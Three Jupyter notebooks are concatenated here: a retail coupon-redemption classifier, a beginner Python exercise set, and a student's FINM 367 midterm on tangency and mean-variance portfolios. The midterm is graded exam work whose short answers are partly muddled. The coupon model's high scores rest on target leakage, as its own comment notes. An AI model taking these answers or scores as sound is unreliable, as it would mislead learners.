ABC's promotions are shared across various channels including email, notifications, etc. A number of these campaigns include coupon discounts that are offered for a specific product/range of products. The retailer would like the ability to predict whether customers will redeem the coupons received across channels, which will enable the retailer's marketing team to accurately design coupon constructs and develop more precise and targeted marketing strategies.

The data available in this problem contains the following information, including the details of a sample of campaigns and coupons used in previous campaigns:
- User demographic details
- Campaign and coupon details
- Product details
- Previous transactions

Based on previous transaction & performance data from the last 18 campaigns, predict the probability, for the next 10 campaigns in the test set and for each coupon and customer combination, that the customer will redeem the coupon.

Dataset Description: Here is the schema for the different data tables available.
The detailed data dictionary is provided next. You are provided with the following files in train.zip:

train.csv: Train data containing the coupons offered to the given customers under the 18 campaigns
- id: Unique id for coupon customer impression
- campaign_id: Unique id for a discount campaign
- coupon_id: Unique id for a discount coupon
- customer_id: Unique id for a customer
- redemption_status (target): 0 - Coupon not redeemed, 1 - Coupon redeemed

campaign_data.csv: Campaign information for each of the 28 campaigns
- campaign_id: Unique id for a discount campaign
- campaign_type: Anonymised Campaign Type (X/Y)
- start_date: Campaign Start Date
- end_date: Campaign End Date

coupon_item_mapping.csv: Mapping of coupon and items valid for discount under that coupon
- coupon_id: Unique id for a discount coupon (no order)
- item_id: Unique id for items for which given coupon is valid (no order)

customer_demographics.csv: Customer demographic information for some customers
- customer_id: Unique id for a customer
- age_range: Age range of customer family in years
- marital_status: Married/Single
- rented: 0 - not rented accommodation, 1 - rented accommodation
- family_size: Number of family members
- no_of_children: Number of children in the family
- income_bracket: Label Encoded Income Bracket (higher income corresponds to a higher number)

customer_transaction_data.csv: Transaction data for all customers for the duration of campaigns in the train data
- date: Date of Transaction
- customer_id: Unique id for a customer
- item_id: Unique id for item
- quantity: Quantity of item bought
- selling_price: Sales value of the transaction
- other_discount: Discount from other sources such as manufacturer coupon/loyalty card
- coupon_discount: Discount availed from retailer coupon

item_data.csv: Item information for each item sold by the retailer
- item_id: Unique id for item
- brand: Unique id for item brand
- brand_type: Brand Type (Local/Established)
- category: Item Category

test.csv: Contains the coupon customer combination for which redemption status is to be predicted
- id: Unique id for coupon customer impression
- campaign_id: Unique id for a discount campaign
- coupon_id: Unique id for a discount coupon
- customer_id: Unique id for a customer

*Campaign, coupon and customer data for the test set is also contained in train.zip

sample_submission.csv: This file contains the format in which you have to submit your predictions.

To summarise the entire process:
- Customers receive coupons under various campaigns and may choose to redeem them.
- They can redeem the given coupon for any valid product for that coupon, as per the coupon item mapping, within the duration between the campaign start date and end date.
- Next, the customer will redeem the coupon for an item at the retailer store, and that will reflect in the transaction table in the column coupon_discount.
###Code
'''
https://www.kaggle.com/bharath901/amexpert-2019/data#
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report, precision_score, recall_score, f1_score, accuracy_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import confusion_matrix
from sklearn.feature_selection import RFE
import csv
###Output
_____no_output_____
###Markdown
Importing the various data files
###Code
'''
Defining a Class to import the Data into a pandas DataFrame for analysis
- Method to storing the Data into a DataFrame
- Method to extracting Information of the Data to understand datatype associated with each column
- Method to describing the Data
- Method to understanding Null values distribution
- Method to understanding Unique values distribution
'''
class import_data():
'''
Method to extract and store the data as pandas dataframe
'''
def __init__(self,path):
self.raw_data = pd.read_csv(path)
display (self.raw_data.head(10))
'''
Method to extract information about the data and display
'''
def get_info(self):
display (self.raw_data.info())
'''
Method to describe the data
'''
def get_describe(self):
display (self.raw_data.describe())
'''
Method to understand Null values distribution
'''
def null_value(self):
col_null = pd.DataFrame(self.raw_data.isnull().sum()).reset_index()
col_null.columns = ['DataColumns','NullCount']
col_null['NullCount_Pct'] = round((col_null['NullCount']/self.raw_data.shape[0])*100,2)
display (col_null)
'''
Method to understand Unique values distribution
'''
def unique_value(self):
col_uniq = pd.DataFrame(self.raw_data.nunique()).reset_index()
col_uniq.columns = ['DataColumns','UniqCount']
col_uniq_cnt = pd.DataFrame(self.raw_data.count(axis=0)).reset_index()
col_uniq_cnt.columns = ['DataColumns','UniqCount']
col_uniq['UniqCount_Pct'] = round((col_uniq['UniqCount']/col_uniq_cnt['UniqCount'])*100,2)
display (col_uniq)
'''
Method to return the dataset as dataframe
'''
def return_data(self):
base_loan_data = self.raw_data
return (base_loan_data)
'''
Evaluation and Analysis starts here for train.csv
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/train.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
train_data = data.return_data()
'''
Evaluation and Analysis starts here for Campaign Data
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/campaign_data.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
campaign_data = data.return_data()
'''
Evaluation and Analysis starts here for Coupon Data
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/coupon_item_mapping.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
coupon_data = data.return_data()
'''
Evaluation and Analysis starts here for Item Data
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/item_data.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
item_data = data.return_data()
'''
Evaluation and Analysis starts here for Customer Demographic
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/customer_demographics.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
cust_demo_data = data.return_data()
'''
Evaluation and Analysis starts here for Customer Transaction
'''
#path = str(input('Enter the path to load the dataset:'))
path = './data/customer_transaction_data.csv'
print ('='*100)
data = import_data(path)
#data.get_info()
#data.null_value()
#data.unique_value()
#data.get_describe()
cust_tran_data = data.return_data()
'''
Function to write the experiment result to csv file
'''
file_write_cnt = 1
# writing the baseline results to csv file
def write_file(F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11):
# field names
fields = ['Expt No','Outlier Treatment','Skewness Treatment','Null Treatment',
'No of Features','Feature Selected','Model Used','Precision for 1',
'Recall for 1','Accuracy','Comment']
# data in the file
rows = [[F1,F2,F3,F4,F5,F6,F7,F8,F9,F10,F11]]
# name of csv file
filename = "./data/score_dashboard.csv"
if int(F1) == 1:
# writing to csv file
with open(filename, 'w', newline='') as csvfile:
# creating a csv writer object
csvwriter = csv.writer(csvfile)
# writing the fields
csvwriter.writerow(fields)
# writing the data rows
csvwriter.writerows(rows)
if int(F1) > 1:
# writing to csv file
with open(filename, 'a', newline='') as csvfile:
# creating a csv writer object
csvwriter = csv.writer(csvfile)
# writing the data rows
csvwriter.writerows(rows)
'''
Function to convert the date into quarter
'''
def date_q(date,split):
if split == '/':
"""
Convert Date to Quarter when separated with /
"""
qdate = date.strip().split('/')[1:]
qdate1 = qdate[0]
if qdate1 in ['01','02','03']:
return (str('Q1' + '-' + qdate[1]))
if qdate1 in ['04','05','06']:
return (str('Q2' + '-' + qdate[1]))
if qdate1 in ['07','08','09']:
return (str('Q3' + '-' + qdate[1]))
if qdate1 in ['10','11','12']:
return (str('Q4' + '-' + qdate[1]))
if split == '-':
"""
Convert Date to Quarter when separated with -
"""
qdate = date.strip().split('-')[0:2]
qdate1 = qdate[1]
qdate2 = str(qdate[0])
if qdate1 in ['01','02','03']:
return (str('Q1' + '-' + qdate2[2:]))
if qdate1 in ['04','05','06']:
return (str('Q2' + '-' + qdate2[2:]))
if qdate1 in ['07','08','09']:
return (str('Q3' + '-' + qdate2[2:]))
if qdate1 in ['10','11','12']:
return (str('Q4' + '-' + qdate2[2:]))
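# quick sanity check of date_q (illustrative inputs matching the two formats
# used below: campaign dates as dd/mm/yy and transaction dates as yyyy-mm-dd):
#   date_q('13/05/18', '/')   -> 'Q2-18'
#   date_q('2013-05-21', '-') -> 'Q2-13'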
'''
Function to aggregate Customer Transaction Data
'''
def tran_summation(column):
cust_tran_data_expt['tot_'+column] = pd.DataFrame(cust_tran_data_expt.groupby(['customer_id','item_id','coupon_id'])[column].transform('sum'))
cust_tran_data_expt.drop([column],axis=1,inplace=True)
def tran_summation_1(column):
cust_tran_data_expt['tot_'+column] = pd.DataFrame(cust_tran_data_expt.groupby(['customer_id','item_id','coupon_id','tran_date_q'])[column].transform('sum'))
cust_tran_data_expt.drop([column],axis=1,inplace=True)
def tran_summation_2(column):
cust_tran_data_expt['tot_'+column] = pd.DataFrame(cust_tran_data_expt.groupby(['customer_id','coupon_id'])[column].transform('sum'))
cust_tran_data_expt.drop([column],axis=1,inplace=True)
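# note: groupby(...).transform('sum') broadcasts each group's total back onto
# every row, so the duplicated rows have to be dropped afterwards (this is done
# with drop_duplicates in the cells below)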
'''
Function to label encode
'''
def label_encode(column):
train_data_merge[column] = train_data_merge[column].astype('category').cat.codes
'''
Function to convert Categorical column to Integer using Coupon Redemption percentage
'''
def cat_percent(column):
train_data_merge[column+'_redeem_sum'] = pd.DataFrame(train_data_merge.groupby([column])['redemption_status'].transform('sum'))
train_data_merge[column+'_redeem_count'] = pd.DataFrame(train_data_merge.groupby([column])['redemption_status'].transform('count'))
train_data_merge[column+'_redeem_percent'] = pd.DataFrame(train_data_merge[column+'_redeem_sum']*100/train_data_merge[column+'_redeem_count'])
train_data_merge.drop(column,axis=1,inplace=True)
train_data_merge.drop([column+'_redeem_sum'],axis=1,inplace=True)
train_data_merge.drop([column+'_redeem_count'],axis=1,inplace=True)
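# note: cat_percent is target (mean) encoding: each category is replaced by its
# in-sample redemption rate. Since it is computed on the full training frame
# before the train/test split, the encoding leaks the target, so the test
# scores reported below are likely optimistic.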
###Output
_____no_output_____
###Markdown
Defining a baseline model with basic data preprocessing.
###Code
cust_demo_data_expt = cust_demo_data.copy()
cust_demo_data_expt['marital_status'].fillna('Unspecified',inplace=True)
cust_demo_data_expt['no_of_children'].fillna(0,inplace=True)
cust_demo_data_expt['age_range'].replace(['18-25','26-35','36-45','46-55','56-70','70+'],[18,26,36,46,56,70],inplace=True)
cust_demo_data_expt['family_size'].replace('5+',5,inplace=True)
cust_demo_data_expt['no_of_children'].replace('3+',3,inplace=True)
cust_tran_data_expt = cust_tran_data.copy()
cust_tran_data_expt = pd.merge(cust_tran_data_expt,coupon_data,how='inner',on='item_id')
cust_tran_data_expt.drop('date',axis=1,inplace=True)
for column in ['quantity','coupon_discount','other_discount','selling_price']:
tran_summation(column)
cust_tran_data_expt.drop_duplicates(subset=['customer_id','item_id','coupon_id'], keep='first', inplace=True)
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data_expt,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge.drop('marital_status',axis=1,inplace=True)
train_data_merge.fillna({'age_range':0,'rented':0,'family_size':0,'no_of_children':0,'income_bracket':0},inplace=True)
train_data_merge['family_size'].astype('int8')
train_data_merge['no_of_children'].astype('int8')
train_data_merge = pd.get_dummies(train_data_merge, columns=['brand_type','category'], drop_first=False)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
X_train,X_test,y_train,y_test = train_test_split(X,y,train_size=0.7,random_state=7)
# defining the model
classifier = LogisticRegression(solver='lbfgs',max_iter=10000)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for Logistic Regression Baseline model
print ("Classification Report for Baseline Logistic Regression")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),list(X.columns),'Logistic Regresssion',report['precision'][1],report['recall'][1],report['support']['accuracy'],'Baseline Model')
file_write_cnt = file_write_cnt + 1
# defining the model
classifier = RandomForestClassifier(n_estimators=100)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for RandomForest Classifier Baseline model
print ("Classification Report for Baseline RandomForest Classifier")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),X.columns,'Random Forest Classifier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'Baseline Model')
file_write_cnt += 1
###Output
Classification Report for Baseline RandomForest Classifier
precision recall f1-score support
0 0.98 1.00 0.99 20278
1 0.97 0.83 0.90 2240
accuracy 0.98 22518
macro avg 0.98 0.91 0.94 22518
weighted avg 0.98 0.98 0.98 22518
###Markdown
One Hot Encoding
###Code
del train_data_merge
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge['no_of_children'].fillna(0,inplace=True)
train_data_merge.fillna({'marital_status':'Unspecified','rented':'Unspecified','family_size':'Unspecified','age_range':'Unspecified'},inplace=True)
train_data_merge['income_bracket'].fillna(train_data_merge['income_bracket'].mean(),inplace=True)
train_data_merge.drop(['id'],axis=1,inplace=True)
train_data_merge['no_of_children'].replace('3+',3,inplace=True)
train_data_merge['no_of_children'].astype('int')
train_data_merge = pd.get_dummies(train_data_merge, columns=['age_range','marital_status','rented','family_size','brand_type','category'], drop_first=False)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
X_train,X_test,y_train,y_test = train_test_split(X,y,train_size=0.7,random_state=7)
# defining the model
classifier = RandomForestClassifier(n_estimators=100)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for RandomForest Classifier Baseline model
print ("Classification Report for RandomForest Classifier")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),X.columns,'Random Forest Classfier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'with OHE')
file_write_cnt += 1
###Output
Classification Report for RandomForest Classifier
precision recall f1-score support
0 0.98 1.00 0.99 20278
1 0.96 0.79 0.87 2240
accuracy 0.98 22518
macro avg 0.97 0.89 0.93 22518
weighted avg 0.98 0.98 0.98 22518
###Markdown
Label Encoding
###Code
del train_data_merge
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge['no_of_children'].fillna(0,inplace=True)
train_data_merge.fillna({'marital_status':'Unspecified','rented':'Unspecified','family_size':'Unspecified','age_range':'Unspecified'},inplace=True)
train_data_merge['income_bracket'].fillna(train_data_merge['income_bracket'].mean(),inplace=True)
train_data_merge['no_of_children'].replace('3+',3,inplace=True)
train_data_merge['no_of_children'].astype('int')
train_data_merge.drop(['id'],axis=1,inplace=True)
for column in ['marital_status','rented','family_size','age_range','brand_type','category']:
label_encode(column)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
X_train,X_test,y_train,y_test = train_test_split(X,y,train_size=0.7,random_state=7)
# defining the model
classifier = RandomForestClassifier(n_estimators=100)
# fitting the model
classifier.fit(X_train,y_train)
# predicting test result with model
y_pred = classifier.predict(X_test)
# Creating Classification report for RandomForest Classifier Baseline model
print ("Classification Report for RandomForest Classifier")
print(classification_report(y_test,y_pred))
report = pd.DataFrame(classification_report(y_test,y_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X.columns),X.columns,'Random Forest Classifier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'with Label Encoding')
file_write_cnt += 1
###Output
Classification Report for RandomForest Classifier
precision recall f1-score support
0 0.98 1.00 0.99 20278
1 0.96 0.82 0.88 2240
accuracy 0.98 22518
macro avg 0.97 0.91 0.94 22518
weighted avg 0.98 0.98 0.98 22518
###Markdown
Feature Engineering with Treatment of Campaign Date, Transaction Date and using Coupon Redemption percentage as a value to convert categorical columns to integers
###Code
del train_data_merge
del cust_tran_data_expt
campaign_data_expt = campaign_data.copy()
campaign_data_expt['start_date_q'] = campaign_data_expt['start_date'].map(lambda x: date_q(x,'/'))
campaign_data_expt['end_date_q'] = campaign_data_expt['end_date'].map(lambda x: date_q(x,'/'))
campaign_data_expt.drop(['start_date','end_date'],axis=1,inplace=True)
cust_tran_data_expt = cust_tran_data.copy()
cust_tran_data_expt = pd.merge(cust_tran_data_expt,coupon_data,how='inner',on='item_id')
cust_tran_data_expt['tran_date_q'] = cust_tran_data_expt['date'].map(lambda x: date_q(x,'-'))
cust_tran_data_expt.drop('date',axis=1,inplace=True)
for column in ['quantity','coupon_discount','other_discount','selling_price']:
tran_summation_1(column)
cust_tran_data_expt.drop_duplicates(subset=['customer_id','item_id','coupon_id','tran_date_q'], keep='first', inplace=True)
train_data_merge = pd.merge(train_data,cust_tran_data_expt,how='inner',on=['customer_id','coupon_id'])
train_data_merge = pd.merge(train_data_merge,cust_demo_data,how='left',on='customer_id')
train_data_merge = pd.merge(train_data_merge,item_data,how='left',on='item_id')
train_data_merge = pd.merge(train_data_merge,campaign_data_expt,how='left',on='campaign_id')
train_data_merge['no_of_children'].fillna(0,inplace=True)
train_data_merge.fillna({'marital_status':'Unspecified','rented':'Unspecified','family_size':'Unspecified','age_range':'Unspecified','income_bracket':'Unspecified'},inplace=True)
train_data_merge.drop('id',axis=1,inplace=True)
train_data_merge['no_of_children'].replace('3+',3,inplace=True)
for column in ['customer_id','coupon_id','item_id','campaign_id','no_of_children','marital_status','rented','family_size','age_range','income_bracket','start_date_q','end_date_q','tran_date_q','brand','category']:
cat_percent(column)
train_data_merge = pd.get_dummies(train_data_merge, columns=['campaign_type','brand_type'], drop_first=False)
X = train_data_merge.drop('redemption_status', axis=1)
y = train_data_merge['redemption_status']
feature_sel = [5,10,15,23]
rforc = RandomForestClassifier(n_estimators=100)
for i in feature_sel:
rfe = RFE(rforc, n_features_to_select=i)
rfe.fit(X, y)
# Selecting columns
sel_cols = []
for a, b, c in zip(rfe.support_, rfe.ranking_, X.columns):
if b == 1:
sel_cols.append(c)
print ('Number of features selected are ::',i)
print ('Columns Selected are ::',sel_cols)
# Creating new DataFrame with selected columns only as X
X_sel = X[sel_cols]
# Split data in to train and test
X_sel_train, X_sel_test, y_sel_train, y_sel_test = train_test_split(X_sel, y, train_size=0.7, random_state=7)
# Fit and Predict the model using selected number of features
grid={"n_estimators":[100]}
rforc_cv = GridSearchCV(rforc,grid,cv=10)
rforc_cv.fit(X_sel_train, y_sel_train)
rforc_pred = rforc_cv.predict(X_sel_test)
# Classification Report
print(classification_report(y_sel_test,rforc_pred))
report = pd.DataFrame(classification_report(y_sel_test,rforc_pred,output_dict=True)).transpose()
write_file(file_write_cnt,'No','No','Yes',len(X_sel.columns),X_sel.columns,'Random Forest Classifier',report['precision'][1],report['recall'][1],report['support']['accuracy'],'Treating Date and Label Encoding with RFE')
file_write_cnt += 1
###Output
Number of features selected are :: 5
Columns Selected are :: ['customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'income_bracket_redeem_percent']
precision recall f1-score support
0 1.00 1.00 1.00 27272
1 0.98 0.98 0.98 3718
accuracy 0.99 30990
macro avg 0.99 0.99 0.99 30990
weighted avg 0.99 0.99 0.99 30990
Number of features selected are :: 10
Columns Selected are :: ['tot_coupon_discount', 'tot_selling_price', 'customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'family_size_redeem_percent', 'age_range_redeem_percent', 'income_bracket_redeem_percent', 'brand_redeem_percent']
precision recall f1-score support
0 1.00 1.00 1.00 27272
1 0.97 0.97 0.97 3718
accuracy 0.99 30990
macro avg 0.99 0.98 0.98 30990
weighted avg 0.99 0.99 0.99 30990
Number of features selected are :: 15
Columns Selected are :: ['tot_coupon_discount', 'tot_other_discount', 'tot_selling_price', 'customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'marital_status_redeem_percent', 'family_size_redeem_percent', 'age_range_redeem_percent', 'income_bracket_redeem_percent', 'end_date_q_redeem_percent', 'brand_redeem_percent', 'category_redeem_percent', 'campaign_type_Y']
precision recall f1-score support
0 1.00 1.00 1.00 27272
1 0.97 0.97 0.97 3718
accuracy 0.99 30990
macro avg 0.98 0.98 0.98 30990
weighted avg 0.99 0.99 0.99 30990
Number of features selected are :: 23
Columns Selected are :: ['tot_quantity', 'tot_coupon_discount', 'tot_other_discount', 'tot_selling_price', 'customer_id_redeem_percent', 'coupon_id_redeem_percent', 'item_id_redeem_percent', 'campaign_id_redeem_percent', 'no_of_children_redeem_percent', 'marital_status_redeem_percent', 'rented_redeem_percent', 'family_size_redeem_percent', 'age_range_redeem_percent', 'income_bracket_redeem_percent', 'start_date_q_redeem_percent', 'end_date_q_redeem_percent', 'tran_date_q_redeem_percent', 'brand_redeem_percent', 'category_redeem_percent', 'campaign_type_X', 'campaign_type_Y', 'brand_type_Established', 'brand_type_Local']
precision recall f1-score support
0 0.99 1.00 1.00 27272
1 0.98 0.96 0.97 3718
accuracy 0.99 30990
macro avg 0.99 0.98 0.98 30990
weighted avg 0.99 0.99 0.99 30990
|
Assignment Dated 14-12-19.ipynb | ###Markdown
1. Find the list of words that are longer than n from a given list of words
###Code
def long_words(n,str):
words = []
txt = str.split(" ")
for x in txt:
if len(x)>n:
words.append(x)
return words
print(long_words(3, 'Python program to find the list of words that are longer than n from a given list of words.'))
###Output
['Python', 'program', 'find', 'list', 'words', 'that', 'longer', 'than', 'from', 'given', 'list', 'words.']
###Markdown
2. Write a Python function that takes two lists and returns True if they have at least one common member.
###Code
lst1 = [1,2,3,4,5,56]
lst2 = [2,4,5,67,8,3]
def common_member(lst1,lst2):
for x in lst1:
for y in lst2:
if x==y:
return True
print(common_member(lst1,lst2))
###Output
True
###Markdown
3. Write a Python program to print the numbers of a specified list after removing even numbers from it.
###Code
num = [7, 8, 120, 25, 44, 20, 27]
# iterate over a copy: removing items from the list you are looping over skips elements
for x in num[:]:
    if x % 2 == 0:
        num.remove(x)
print(num)
###Output
[7, 25, 27]
###Markdown
4. Write a Python program to generate and print a list of the first and last 5 elements, where the values are the squares of the numbers between 1 and 30 (both included).
###Code
def elements():
l = list()
for x in range(1,31):
l.append(x**2)
return l[:5], l[-5:]
print(elements())
###Output
([1, 4, 9, 16, 25], [676, 729, 784, 841, 900])
###Markdown
5. Write a Python program to find the second smallest number in a list.
###Code
lst = [7, 120, 25, 20, 27]
def smallest_number(lst):
    # bubble sort: keep passing over the list until no swaps are made
    while True:
        corrected = False
        for i in range(0, len(lst) - 1):
            if lst[i] > lst[i + 1]:
                lst[i], lst[i + 1] = lst[i + 1], lst[i]
                corrected = True
        if not corrected:
            return lst[1], lst
smallest_number(lst)
###Output
_____no_output_____
###Markdown
6. Write a Python script to sort (ascending) a dictionary by value
###Code
d = {1: 2, 3: 4, 4: 3, 2: 1, 0: 0}
sorted_d = {}
y = sorted(d.values())
for x in y:
for k,y in d.items():
if x == y:
sorted_d.update({k:y})
print(sorted_d)
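# equivalent one-liner (dicts keep insertion order in Python 3.7+):
# sorted_d = dict(sorted(d.items(), key=lambda kv: kv[1]))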
###Output
{0: 0, 2: 1, 1: 2, 4: 3, 3: 4}
###Markdown
7. Write a Python program to count the number of items in dictionary values that are lists.
###Code
dict = {'Alex': ['subj1', 'subj2', 'subj3'], 'David': ['subj1', 'subj2']}
count = 0
for k,v in dict.items():
outpt = len(v)
count = count+outpt
print(count)
###Output
5
###Markdown
8. Write a Python program to sort a Counter by value.
###Code
d= {'Math':81, 'Physics':83, 'Chemistry':87}
sorted_d = {}
y = sorted(d.values())
for x in y:
for key,val in d.items():
if val==x:
sorted_d.update({key:val})
print(sorted_d)
# other Way
from collections import Counter
x = Counter({'Math':81, 'Physics':83, 'Chemistry':87})
print(x.most_common())
###Output
{'Math': 81, 'Physics': 83, 'Chemistry': 87}
[('Chemistry', 87), ('Physics', 83), ('Math', 81)]
###Markdown
9. Write a Python program to combine values in a Python list of dictionaries.
###Code
from collections import Counter
item_list = [{'item': 'item1', 'amount': 400}, {'item': 'item2', 'amount': 300}, {'item': 'item1', 'amount': 750}]
result = Counter()
for d in item_list:
result[d['item']] += d['amount']
print(result)
###Output
Counter({'item1': 1150, 'item2': 300})
###Markdown
10. Write a Python program to print all unique values in a dictionary.
###Code
l = [{"V":"S001"}, {"V": "S002"}, {"VI": "S001"}, {"VI": "S005"}, {"VII":"S005"}, {"V":"S009"},{"VIII":"S007"}]
# val for dic in L for val in dic.values()
s = set()
for dic in l:
for val in dic.values():
s.add(val)
print(s)
###Output
{'S005', 'S007', 'S001', 'S009', 'S002'}
|
solutions/mid1/submissions/santosojosephine_141068_6241604_MIDTERM.ipynb | ###Markdown
FINM 367 Midterm 1
Josephine Santoso

Section 1

1. False. Mean-variance optimization does not diversify assets according to Sharpe ratios; the weights depend on the covariances, not just the volatilities.
2. False. Even though the daily tracking error of an LETF is small, the LETF resets its leverage daily and does not compound to the levered multi-period return, so the gap can become huge over time (a short numerical illustration follows below). If we expect our investments to be positive in the long term, we would probably want to compound them to gain more returns.
3. Given that we only have a year of data, and because we don't really trust it, it would be better to estimate the regression with an intercept, because we want to focus on explaining the variation. Without an intercept, the mean needs to be captured by the betas, which would not be very accurate given such a small sample.
4. HDG is quite effective in replicating HFRI in sample and out of sample, especially with the rolling strategy. In sample is obviously better at replicating HFRI than out of sample, because there is a lag in the out-of-sample replication.
5. The hedge fund may have regressed their returns on bad factors/standards instead of the 6 Merrill Lynch style factors. The alphas in the regression depend on the factors we regress on.
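A minimal numerical sketch of the compounding point in (2), with made-up daily returns:
```python
# hypothetical two-day example: a daily-reset 2x LETF vs. 2x the buy-and-hold return
r1, r2 = 0.10, -0.10
letf = (1 + 2*r1) * (1 + 2*r2) - 1        # daily-reset 2x: about -0.04
target = 2 * ((1 + r1) * (1 + r2) - 1)    # 2x the two-day return: -0.02
print(letf, target)                       # the gap grows with horizon and volatility
```

Section 2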
###Code
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf
import statsmodels.api as sm
import matplotlib.pyplot as plt
import seaborn as sns
from dataclasses import dataclass
import warnings
import scipy.stats
sns.set()
df_merrill = pd.read_excel('hw2/proshares_analysis_data.xlsx', sheet_name='merrill_factors').set_index('date')
df_merrill.head()
df_merrill_excess = df_merrill.apply(lambda x: x - x['USGG3M Index'], axis=1)
df_merrill_excess = df_merrill_excess[['SPY US Equity', 'EEM US Equity', 'EFA US Equity', 'EUO US Equity', 'IWM US Equity']]
df_merrill_excess.head()
###Output
_____no_output_____
###Markdown
Question 1
###Code
# define a function to calculate tangency portfolio
# the input df must have annualized returns and it must be excess returns
def compute_tangency_portfolio(df):
#define sigma matrix
sigma = df.cov()
#define n to be used for the ones vector
n = sigma.shape[0]
#inverse sigma
sigma_inv = np.linalg.inv(sigma)
#define mu
mu = df.mean()
#calculate tangent portfolio, @ is used for matrix multiplication
w_tan = sigma_inv @ mu / (np.ones(n) @ sigma_inv @ mu)
#map omega_tan back to pandas
w_tan = pd.Series(w_tan, index=mu.index)
#return weights of tangency portfolio, sigma_inv, mu
return w_tan, sigma_inv, mu
# annualizing returns
df_merrill_excess_annualized = df_merrill_excess*12
w_tan, sigma_inv_tan , mu_tan = compute_tangency_portfolio(df_merrill_excess_annualized)
w_tan.to_frame('Tangency Weights')
###Output
_____no_output_____
###Markdown
Question 2
###Code
#define a function to calculate target MV portfolio
#the input df must have annualized returns and it must be excess returns
#returns the allocation delta and omega_p (final weights of risky assets)
def target_mv_portfolio(df, target_return):
w_tan, sigma_inv_tan , mu_tan = compute_tangency_portfolio(df)
n = len(w_tan)
# compute allocation
delta = (np.ones(n) @ sigma_inv_tan @ mu_tan)/(mu_tan.transpose() @ sigma_inv_tan @ mu_tan) * target_return
# final weights are allocated weights to risky asset * weights in the risky assets
w_p_star = delta * w_tan
return delta, w_p_star
delta, w_p_star = target_mv_portfolio(df_merrill_excess_annualized, 0.02*12)
print('Allocated to portfolio: ', delta) # this is how much is allocated to the portfolio, 1-delta is allocated to risk free
print('Allocated to risk free: ', 1-delta)
#print(w_p_star) # this is the final weights of the portfolio
w_p_star.to_frame('MV Portfolio weights')
###Output
Allocated to portfolio: 1.15756108337791
Allocated to risk free: -0.15756108337790997
###Markdown
It is borrowing at the risk-free rate in order to achieve the targeted mean.

Question 3
###Code
# function to evaluate performance measure of a portfolio
# input is porfolio weights and data in excess returns
def performance_measure(w_portfolio, df, annualize_factor):
#mean of portfolio is (w_p' * mean excess return) * annualize factor
portfolio_mu = w_portfolio.transpose() @ df.mean() * annualize_factor
#vol of portfolio is sqrt(w_p' * sigma * w_p) * sqrt(annualize_factor)
portfolio_sigma = np.sqrt(w_portfolio.transpose() @ df.cov() @ w_portfolio) * np.sqrt(annualize_factor)
#sharpe ratio of portfolio
portfolio_sharpe = portfolio_mu / portfolio_sigma
# prints portfolio mean, volatility and sharpe ratio
print('mean', round(portfolio_mu,4), ' vol', round(portfolio_sigma,4), 'sharpe ratio ', round(portfolio_sharpe,4))
#return portfolio_mu, portfolio_sigma, portfolio_sharpe
performance_measure(w_p_star, df_merrill_excess, 12)
###Output
mean 0.24 vol 0.1586 sharpe ratio 1.5136
###Markdown
Question 4
###Code
